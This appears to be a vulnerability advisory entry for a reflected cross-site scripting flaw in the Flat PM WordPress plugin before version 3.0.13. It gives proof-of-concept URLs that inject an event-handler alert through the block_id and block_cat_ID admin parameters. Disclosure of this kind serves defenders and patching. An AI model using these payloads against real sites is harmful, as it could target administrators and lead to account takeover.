WordPress Plugin Vulnerabilities
Flat PM < 3.0.13 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Proof of Concept
v < 3.0.13 (the block_id needs to start with an existing block ID https://example.com/wp-admin/admin.php?page=blocks_form&block_id=567"+style=animation-name:rotation+onanimationstart=alert(/XSS/)// v < 2.662 https://example.com/wp-admin/admin.php?page=blocks_form&block_cat_ID=1"+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-17 (about 1 years ago)
Added
2022-11-17 (about 1 years ago)
Last Updated
2023-02-27 (about 1 years ago)